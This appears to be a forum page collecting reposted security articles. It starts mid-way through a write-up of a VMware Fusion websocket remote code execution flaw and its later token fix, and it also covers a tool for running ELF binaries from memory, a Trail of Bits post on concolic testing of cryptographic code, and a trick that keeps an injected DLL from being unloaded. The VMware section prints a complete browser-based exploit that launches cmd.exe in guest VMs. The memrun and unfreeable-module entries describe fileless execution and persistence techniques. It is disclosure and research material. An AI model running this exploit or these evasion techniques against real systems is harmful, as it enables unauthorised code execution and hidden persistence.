}, { "name": "macOS 10.14", "cachePath": "/Users/csaby/VM/macOS 10.14.vmwarevm/startMenu.plist" }, { "name": "Windows 10 x64", "cachePath": "/Users/csaby/VM/Windows 10 x64.vmwarevm/startMenu.plist" } ], "menu": { "pinnedApps": [], "frequentlyUsedApps": [ { "rawIcons": [ { (...) This is a bit less and more what we can see through the API discussed earlier. So more info leak. Websocket - full RCE (without vmUUID) The next interesting item was the menu.selectIndex, it suggested that you can select VMs, it even had a relatated code in the app.asar file, which told me how to call it: // Called when VM selection changed selectIndex(index: number) { log.info('Renderer#ActionService::selectIndex: (index:', index, ')'); if (this.checkIsFusionUIRunning()) { this.send({ name: 'menu.selectIndex', userInfo: { selectedIndex: index } }); } If we called this item, as suggested above, and then tried to launch an app in the guest, we could instruct which guest to run the app in. Basically we can select a VM with this call. const payload = { "name":"menu.selectIndex", "userInfo": { "selectedIndex":"3" } }; The next thing I tried if I can use the selectedIndex directly in the menu.onAction call, and it turned out that yes I can. It also became clear that the vmList I get with menu.refresh has the right order and indexes for each VM. In order to gain a full RCE: 1. Leak the list of VMs with menu.refresh 2. Launch an application on the guest by using the index The full POC: <script> ws = new WebSocket("ws://127.0.0.1:8698/ws"); ws.onopen = function() { //payload to show vm names and cache path const payload = { "name":"menu.refresh", }; ws.send(JSON.stringify(payload)); }; ws.onmessage = function(data) { //document.write(data.data); console.log(JSON.parse(data.data)); var j_son = JSON.parse(data.data); var vmlist = j_son.value.vmList; var i; for (i = 0; i < vmlist.length; i++) { //payload to launch an app, you can use either the vmUUID or the selectedIndex const payload = { "name":"menu.onAction", "userInfo": { "action":"launchGuestApp:", "selectedIndex":i, "representedObject":"cmd.exe" } }; if (vmlist[i].name.includes("Win") || vmlist[i].name.includes("win")) {ws.send(JSON.stringify(payload));} } ws.close(); }; </script> Reporting to VMware At this point I got in touch with @Codecolorist if he reported this to VMware, and he said that yes, they got in touch with him. I decided to send them another report, as I found this pretty serious and I wanted to urge them, especially because compared to the original POC I found a way to execute this attack without that. The Fix VMware released a fix, and advisory a couple of days ago: VMSA-2019-0005. I took a look at what they did, and essentially they implemented a token authentication, where the token is newly generated every single time starting up VMware. This is the related code for generating a token (taken from app.asar): String.prototype.pick = function(min, max) { var n, chars = ''; if (typeof max === 'undefined') { n = min; } else { n = min + Math.floor(Math.random() * (max - min + 1)); } for (var i = 0; i < n; i++) { chars += this.charAt(Math.floor(Math.random() * this.length)); } return chars; String.prototype.shuffle = function() { var array = this.split(''); var tmp, current, top = array.length; if (top) while (--top) { current = Math.floor(Math.random() * (top + 1)); tmp = array[current]; array[current] = array[top]; array[top] = tmp; } return array.join(''); export class Token { public static generate(): string { const specials = '!@#$%^&*()_+{}:"<>?|[];\',./`~'; const lowercase = 'abcdefghijklmnopqrstuvwxyz'; const uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'; const numbers = '0123456789'; const all = specials + lowercase + uppercase + numbers; let token = ''; token += specials.pick(1); token += lowercase.pick(1); token += uppercase.pick(1); token += numbers.pick(1); token += all.pick(5, 7); token = token.shuffle(); return Buffer.from(token).toString('base64'); } The token will be a variable length password, containing at least 1 character from app, lower case, numbers and symbols. It will be base64 encoded then, we can see it in Wireshark, when VMware uses this: And we can also see it being used in the code: function sendVmrestReady() { log.info('Main#sendVmrestReady'); if (mainWindow) { mainWindow.webContents.send('vmrestReady', [ 'ws://localhost:' + global['port'] + '/ws?token=' + token, 'http://localhost:' + global['port'], '?token=' + token ]); } In case you have code execution on a mac you can probably figure this token out, but in that case it doesn’t really matter anyway. The password will essentially limit the ability to exploit the vulnerability remotely. With some experiments, I also found that you need to set the Origin in the Header to file://, otherwise it will be forbidden, but that you can’t set via normal JS calls, as it will be set by the browser. Like this: Origin: file:// So even if you know the token, you can’t trigger this via normal webpages. Sursa: https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/
    1 point
  10. memrun Small tool written in Golang to run ELF (x86_64) binaries from memory with a given process name. Works on Linux where kernel version is >= 3.17 (relies on the memfd_create syscall). Usage Build it with $ go build memrun.go and execute it. The first argument is the process name (string) you want to see in ps auxww output for example. Second argument is the path for the ELF binary you want to run from memory. Usage: memrun process_name elf_binary Sursa: https://github.com/guitmz/memrun
    1 point
  11. Performing Concolic Execution on Cryptographic Primitives Post April 1, 2019 Leave a comment Alan Cao For my winternship and springternship at Trail of Bits, I researched novel techniques for symbolic execution on cryptographic protocols. I analyzed various implementation-level bugs in cryptographic libraries, and built a prototype Manticore-based concolic unit testing tool, Sandshrew, that analyzed C cryptographic primitives under a symbolic and concrete environment. Sandshrew is a first step for crypto developers to easily create powerful unit test cases for their implementations, backed by advancements in symbolic execution. While it can be used as a security tool to discover bugs, it also can be used as a framework for cryptographic verification. Playing with Cryptographic Verification When choosing and implementing crypto, our trust should lie in whether or not the implementation is formally verified. This is crucial, since crypto implementations often introduce new classes of bugs like bignum vulnerabilities, which can appear probabilistically. Therefore, by ensuring verification, we are also ensuring functional correctness of our implementation. There are a few ways we could check our crypto for verification: Traditional fuzzing. We can use fuzz testing tools like AFL and libFuzzer. This is not optimal for coverage, as finding deeper classes of bugs requires time. In addition, since they are random tools, they aren’t exactly “formal verification,” so much as a sotchastic approximation thereof. Extracting model abstractions. We can lift source code into cryptographic models that can be verified with proof languages. This requires learning purely academic tools and languages, and having a sound translation. Just use a verified implementation! Instead of trying to prove our code, let’s just use something that is already formally verified, like Project Everest’s HACL* library. This strips away configurability when designing protocols and applications, as we are only limited to what the library offers (i.e HACL* doesn’t implement Bitcoin’s secp256k1 curve). What about symbolic execution? Due to its ability to exhaustively explore all paths in a program, using symbolic execution to analyze cryptographic libraries can be very beneficial. It can efficiently discover bugs, guarantee coverage, and ensure verification. However, this is still an immense area of research that has yielded only a sparse number of working implementations. Why? Because cryptographic primitives often rely on properties that a symbolic execution engine may not be able to emulate. This can include the use of pseudorandom sources and platform-specific optimized assembly instructions. These contribute to complex SMT queries passed to the engine, resulting in path explosion and a significant slowdown during runtime. One way to address this is by using concolic execution. Concolic execution mixes symbolic and concrete execution, where portions of code execution can be “concretized,” or run without the presence of a symbolic executor. We harness this ability of concretization in order to maximize coverage on code paths without SMT timeouts, making this a viable strategy for approaching crypto verification. Introducing sandshrew After realizing the shortcomings in cryptographic symbolic execution, I decided to write a prototype concolic unit testing tool, sandshrew. sandshrew verifies crypto by checking equivalence between a target unverified implementation and a benchmark verified implementation through small C test cases. These are then analyzed with concolic execution, using Manticore and Unicorn to execute instructions both symbolically and concretely. Fig 1. Sample OpenSSL test case with a SANDSHREW_* wrapper over the MD5() function. Writing Test Cases We first write and compile a test case that tests an individual cryptographic primitive or function for equivalence against another implementation. The example shown in Figure 1 tests for a hash collision for a plaintext input, by implementing a libFuzzer-style wrapper over the MD5() function from OpenSSL. Wrappers signify to sandshrew that the primitive they wrap should be concretized during analysis. Performing Concretization Sandshrew leverages a symbolic environment through the robust Manticore binary API. I implemented the manticore.resolve() feature for ELF symbol resolution and used it to determine memory locations for user-written SANDSHREW_* functions from the GOT/PLT of the test case binary. Fig 2. Using Manticore’s UnicornEmulator feature in order to concretize a call instruction to the target crypto primitive. Once Manticore resolves out the wrapper functions, hooks are attached to the target crypto primitives in the binary for concretization. As seen in Figure 2, we then harness Manticore’s Unicorn fallback instruction emulator, UnicornEmulator, to emulate the call instruction made to the crypto primitive. UnicornEmulator concretizes symbolic inputs in the current state, executes the instruction under Unicorn, and stores modified registers back to the Manticore state. All seems well, except this: if all the symbolic inputs are concretized, what will be solved after the concretization of the call instruction? Restoring Symbolic State Before our program tests implementations for equivalence, we introduce an unconstrained symbolic variable as the returned output from our concretized function. This variable guarantees a new symbolic input that continues to drive execution, but does not contain previously collected constraints. Mathy Vanhoef (2018) takes this approach to analyze cryptographic protocols over the WPA2 protocol. We do this in order to avoid the problem of timeouts due to complex SMT queries. Fig 3. Writing a new unconstrained symbolic value into memory after concretization. As seen in Figure 3, this is implemented through the concrete_checker hook at the SANDSHREW_* symbol, which performs the unconstrained re-symbolication if the hook detects the presence of symbolic input being passed to the wrapper. Once symbolic state is restored, sandshrew is then able to continue to execute symbolically with Manticore, forking once it has reached the equivalence checking portion of the program, and generating solver solutions. Results Here is Sandshrew performing analysis on the example MD5 hash collision program from earlier: The prototype implementation of Sandshrew currently exists here. With it comes a suite of test cases that check equivalence between a few real-world implementation libraries and the primitives that they implement. Limitations Sandshrew has a sizable test suite for critical cryptographic primitives. However, analysis still becomes stuck for many of the test cases. This may be due to the large statespace needing to be explored for symbolic inputs. Arriving at a solution is probabilistic, as the Manticore z3 interface often times out. With this, we can identify several areas of improvement for the future: Add support for allowing users to supply concrete input sets to check before symbolic execution. With a proper input generator (i.e., radamsa), this potentially hybridizes Sandshrew into a fuzzer as well. Implement Manticore function models for common cryptographic operations. This can increase performance during analysis and allows us to properly simulate execution under the Dolev-Yao verification model. Reduce unnecessary code branching using opportunistic state merging. Conclusion Sandshrew is an interesting approach at attacking the problem of cryptographic verification, and demonstrates the awesome features of the Manticore API for efficiently creating security testing tools. While it is still a prototype implementation and experimental, we invite you to contribute to its development, whether through optimizations or new example test cases. Thank you Working at Trail of Bits was an awesome experience, and offered me a lot of incentive to explore and learn new and exciting areas of security research. Working in an industry environment pushed me to understand difficult concepts and ideas, which I will take to my first year of college. Sursa: https://blog.trailofbits.com/2019/04/01/performing-concolic-execution-on-cryptographic-primitives/
    1 point
  12. Make Your Dynamic Module Unfreeable (Anti-FreeLibrary) 1 minute read Let’s say your product injects a module into a target process, if the target process knows the existence of your module it can call FreeLibrary function to unload your module (assume that the reference count is one). One way to stay injected is to hook FreeLibrary function and check passed arguments every time the target process calls FreeLibrary. There is a way to get the same result without hooking. When a process uses FreeLibrary to free a loaded module, FreeLibrary calls LdrUnloadDll which is exported by ntdll: Inside LdrUnloadDll function, it checks the ProcessStaticImport field of LDR_DATA_TABLE_ENTRY structure to check if the module is dynamically loaded or not. The check happens inside LdrpDecrementNodeLoadCountLockHeld function: If ProcessStaticImport field is set, LdrpDecrementNodeLoadCountLockHeld returns without freeing the loaded module So, if we set the ProcessStaticImport field, FreeLibrary will not be able to unload our module: In this case, the module prints "Hello" every time it attaches to a process, and "Bye!" when it detaches. Note: There is an officially supported way of doing the same thing: Calling GetModuleHandleExA with GET_MODULE_HANDLE_EX_FLAG_PIN flag. "The module stays loaded until the process is terminated, no matter how many times FreeLibrary is called." Thanks to James Forshaw whoami: @_qaz_qaz Sursa: https://secrary.com/Random/anti_FreeLibrary/
    1 point
×
×
  • Create New...